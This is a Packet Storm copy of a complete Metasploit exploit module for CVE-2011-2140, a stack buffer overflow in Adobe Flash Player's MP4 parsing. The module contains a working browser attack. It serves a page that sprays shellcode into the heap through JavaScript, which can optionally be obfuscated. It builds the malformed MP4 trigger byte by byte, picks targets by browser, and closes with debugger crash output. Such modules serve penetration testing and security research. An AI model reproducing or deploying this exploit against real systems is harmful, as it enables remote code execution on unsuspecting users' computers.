This Metasploit module exploits a vulnerability found in Adobe Flash Player's Flash10u.ocx component. When processing a MP4 file (specifically the Sequence Parameter Set), Flash will see if pic_order_cnt_type is equal to 1, which sets the num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies data in offset_for_ref_frame on the stack, which allows arbitrary remote code execution under the context of the user. Numerous reports also indicate that this vulnerability has been exploited in the wild. Please note that the exploit requires a SWF media player in order to trigger the bug, which currently isn't included in the framework. However, software such as Longtail SWF Player is free for non-commercial use, and is easily obtainable.
df9a4f147e437db061fcac07db067da65775ac9fff0ec5fecbe3b18c47f3ceba##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info={})
super(update_info(info,
'Name' => "Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow",
'Description' => %q{
This module exploits a vulnerability found in Adobe Flash Player's Flash10u.ocx
component. When processing a MP4 file (specifically the Sequence Parameter Set),
Flash will see if pic_order_cnt_type is equal to 1, which sets the
num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies data in
offset_for_ref_frame on the stack, which allows arbitrary remote code execution
under the context of the user. Numerous reports also indicate that this
vulnerability has been exploited in the wild.
Please note that the exploit requires a SWF media player in order to trigger
the bug, which currently isn't included in the framework. However, software such
as Longtail SWF Player is free for non-commercial use, and is easily obtainable.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Alexander Gavrun', #RCA
'Abysssec', #PoC
'sinn3r' #Metasploit
],
'References' =>
[
[ 'CVE', '2011-2140' ],
[ 'OSVDB', '74439'],
[ 'BID', '49083' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-276/' ],
[ 'URL', 'http://www.kahusecurity.com/2011/cve-2011-2140-caught-in-the-wild/' ],
[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb11-21.html' ],
[ 'URL', 'http://0x1byte.blogspot.com/2011/11/analysis-of-cve-2011-2140-adobe-flash.html' ],
[ 'URL', 'http://www.abysssec.com/blog/2012/01/31/exploiting-cve-2011-2140-another-flash-player-vulnerability/' ]
],
'Payload' =>
{
'BadChars' => "\x00",
'StackAdjustment' => -3500
},
'DefaultOptions' =>
{
'ExitFunction' => "seh",
'InitialAutoRunScript' => 'migrate -f'
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
[ 'IE 6 on Windows XP SP3', { 'Offset' => '0x600' } ], #0x5f4 = spot on
[ 'IE 7 on Windows XP SP3 / Vista', { 'Offset' => '0x600' } ]
],
'Privileged' => false,
'DisclosureDate' => "Aug 9 2011",
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation']),
OptString.new('SWF_PLAYER_URI', [true, 'Path to the SWF Player'])
], self.class)
end
def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
return targets[1]
elsif agent =~ /MSIE 7/
return targets[2]
else
return nil
end
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
my_target = get_target(agent)
# Avoid the attack if the victim doesn't have the same setup we're targeting
if my_target.nil?
print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}")
send_not_found(cli)
return
end
# The SWF requests our MP4 trigger
if request.uri =~ /\.mp4$/
print_status("Sending MP4 to #{cli.peerhost}:#{cli.peerport}...")
#print_error("Sorry, not sending you the mp4 for now")
#send_not_found(cli)
send_response(cli, @mp4, {'Content-Type'=>'video/mp4'})
return
end
# Set payload depending on target
p = payload.encoded
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
js = <<-JS
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{js_code}");
var nops = unescape("#{js_nops}");
while (nops.length < 0x80000) nops += nops;
var offset = nops.substring(0, #{my_target['Offset']});
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var i=1; i < 0x300; i++) {
heap_obj.alloc(block);
}
JS
js = heaplib(js, {:noobfu => true})
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate
end
myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
mp4_uri = "http://#{myhost}:#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.mp4"
swf_uri = "#{datastore['SWF_PLAYER_URI']}?autostart=true&image=video.jpg&file=#{mp4_uri}"
html = %Q|
<html>
<head>
<script>
#{js}
</script>
</head>
<body>
<object width="1" height="1" type="application/x-shockwave-flash" data="#{swf_uri}">
<param name="movie" value="#{swf_uri}">
</object>
</body>
</html>
|
html = html.gsub(/^\t\t/, '')
print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
def exploit
@mp4 = create_mp4
super
end
def create_mp4
ftypAtom = "\x00\x00\x00\x20" #Size
ftypAtom << "ftypisom"
ftypAtom << "\x00\x00\x02\x00"
ftypAtom << "isomiso2avc1mp41"
mdatAtom = "\x00\x00\x00\x10" #Size
mdatAtom << "mdat"
mdatAtom << "\x00\x00\x02\x8B\x06\x05\xFF\xFF"
moovAtom1 = "\x00\x00\x08\x83" #Size
moovAtom1 << "moov" #Move header box header
moovAtom1 << "\x00\x00\x00"
moovAtom1 << "lmvhd" # Type
moovAtom1 << "\x00\x00\x00\x00" # Version/Flags
moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80" # Creation time
moovAtom1 << "\x00\x00\x03\xE8" # Time scale
moovAtom1 << "\x00\x00\x2F\x80" # Duration
moovAtom1 << "\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
moovAtom1 << "\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00"
moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x02\xFA"
moovAtom1 << "trak" # Track box header
moovAtom1 << "\x00\x00\x00\x5C"
moovAtom1 << "tkhd"
moovAtom1 << "\x00\x00\x00\x0F"
moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80" # Creation time
moovAtom1 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x2E\xE0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
moovAtom1 << "\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
moovAtom1 << "\x00\x00\x00\x00\x40\x00\x00\x00\x01\x42\x00\x00\x01\x42\x00\x00\x00\x00\x02"
moovAtom1 << "rmdia"
moovAtom1 << "\x00\x00\x00\x20" # Size
moovAtom1 << "mdhd" # Media header box
moovAtom1 << "\x00\x00\x00\x00" # Version/Flags
moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80" # Creation time
moovAtom1 << "\x00\x00\x00\x01" # Time scale
moovAtom1 << "\x00\x00\x00\x0C" # Duration
moovAtom1 << "\x55\xC4\x00\x00"
moovAtom1 << "\x00\x00\x00\x2D" # Size
moovAtom1 << "hdlr" # Handler Reference header
moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00"
moovAtom1 << "vide" # Handler type
moovAtom1 << "\x00\x00\x00\x00\x00"
moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00"
moovAtom1 << "VideoHandler" # Handler name
moovAtom1 << "\x00\x00\x00\x02\x1D"
moovAtom1 << "minf"
moovAtom1 << "\x00\x00\x00\x14"
moovAtom1 << "vmhd"
moovAtom1 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x24"
moovAtom1 << "dinf" # Data information box header
moovAtom1 << "\x00\x00\x00\x1c"
moovAtom1 << "dref" # Data reference box
moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01"
moovAtom1 << "\x00\x00\x00\x0C" # Size
moovAtom1 << "url " # Data entry URL box
moovAtom1 << "\x00\x00\x00\x01" # Location / version / flags
moovAtom1 << "\x00\x00\x09\xDD" # Size
moovAtom1 << "stbl"
moovAtom1 << "\x00\x00\x08\x99"
moovAtom1 << "stsd"
moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01"
moovAtom1 << "\x00\x00\x08\x89" # Size
moovAtom1 << "avc1"
moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
moovAtom1 << "\x01\x42" # Width
moovAtom1 << "\x01\x42" # Height
moovAtom1 << "\x00\x48\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
moovAtom1 << "\x18" # Depth
moovAtom1 << "\xFF\xFF"
moovAtom1 << "\x00\x00\x08\x33" # Size
moovAtom1 << "avcC"
moovAtom1 << "\x01" # Config version
moovAtom1 << "\x64" # Avc profile indication
moovAtom1 << "\x00" # Compatibility
moovAtom1 << "\x15" # Avc level indication
moovAtom1 << "\xFF\xE1"
# Although the fields have different values, they all become 0x0c0c0c0c
# in memory.
cycle = "\x00\x00\x00"
cycle << "\x30\x30\x30\x30" #6th
cycle << "\x00\x00\x00"
cycle << "\x18\x18\x18\x18" #7th
cycle << "\x00\x00\x00"
cycle << "\x0c\x0c\x0c\x0c" #8th
cycle << "\x00\x00\x00"
cycle << "\x06\x06\x06\x06" #1st
cycle << "\x00\x00\x00"
cycle << "\x03\x03\x03\x03"
cycle << "\x00\x00\x00\x01\x81\x81\x81\x80\x00\x00\x00"
cycle << "\xc0\xc0\xc0\xc0" # 4th
cycle << "\x00\x00\x00"
cycle << "\x60\x60\x60\x60"
spsunit = "\x08\x1A\x67\x70\x34\x32\x74\x70\x00\x00\xAF\x88\x88\x84\x00\x00\x03\x00\x04\x00\x00\x03\x00\x3F\xFF\xFF\xFF\xFF\xFF"
spsunit << "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
spsunit << "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFC"
spsunit << cycle * 35
spsunit << "\x00\x00\x00\x30\x30\x03\x03\x03\x03\x00\x00\x00\xB2\x2C"
moovAtom2 = "\x00\x00\x00\x18"
moovAtom2 << "stts"
moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0C\x00\x00\x00\x01"
moovAtom2 << "\x00\x00\x00\x14"
moovAtom2 << "stss"
moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00"
moovAtom2 << "pctts"
moovAtom2 << "\x00\x00\x00\x00\x00\x00"
moovAtom2 << "\x00\x0C\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00"
moovAtom2 << "\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x02"
moovAtom2 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00"
moovAtom2 << "\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x02"
moovAtom2 << "\x00\x00\x00\x1C"
moovAtom2 << "stsc"
moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01"
moovAtom2 << "\x00\x00\x00\x44"
moovAtom2 << "stsz"
moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
moovAtom2 << "\x0C\x00\x00\x2F\x8D\x00\x00\x0C\xFE\x00\x00\x04\x42\x00\x00\x0B\x20\x00\x00\x04\x58\x00\x00\x07\x19\x00\x00\x07"
moovAtom2 << "\x63\x00\x00\x02\xD6\x00\x00\x03\xC1\x00\x00\x0A\xDF\x00\x00\x04\x9B\x00\x00\x09\x39"
moovAtom2 << "\x00\x00\x00\x40"
moovAtom2 << "stco"
moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x0C\x00\x00\x00\x30\x00\x00\x2F\xBD\x00\x00\x3D\x8A\x00\x00\x48\x19\x00\x00\x5A\xF4"
moovAtom2 << "\x00\x00\x66\x1F\x00\x00\x73\xEA\x00\x00\x82\x32\x00\x00\x8A\xFA\x00\x00\x95\x51\x00\x00\xA7\x16\x00\x00\xB1\xE5"
moovAtom = moovAtom1 + spsunit + moovAtom2
m = ftypAtom + mdatAtom + moovAtom
return m
end
end
=begin
C:\WINDOWS\system32\Macromed\Flash\Flash10u.ocx
Flash10u+0x5b4e8:
Missing image name, possible paged-out or corrupt data.
1f06b4e8 8901 mov dword ptr [ecx],eax ds:0023:020c0000=00905a4d
0:008> !exchain
020bfdfc: <Unloaded_ud.drv>+c0c0c0b (0c0c0c0c)
ECX points to 0x0c0c0c0c at the time of the crash:
0:008> r
eax=00000000 ebx=00000000 ecx=0c0c0c0c edx=7c9032bc esi=00000000 edi=00000000
eip=0c0c0c0c esp=020befa8 ebp=020befc8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050246
<Unloaded_ud.drv>+0xc0c0c0b:
0c0c0c0c ?? ???
Example of SWF player URI:
http://www.jeroenwijering.com/embed/mediaplayer.swf
To-do:
IE 8 target
=end
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed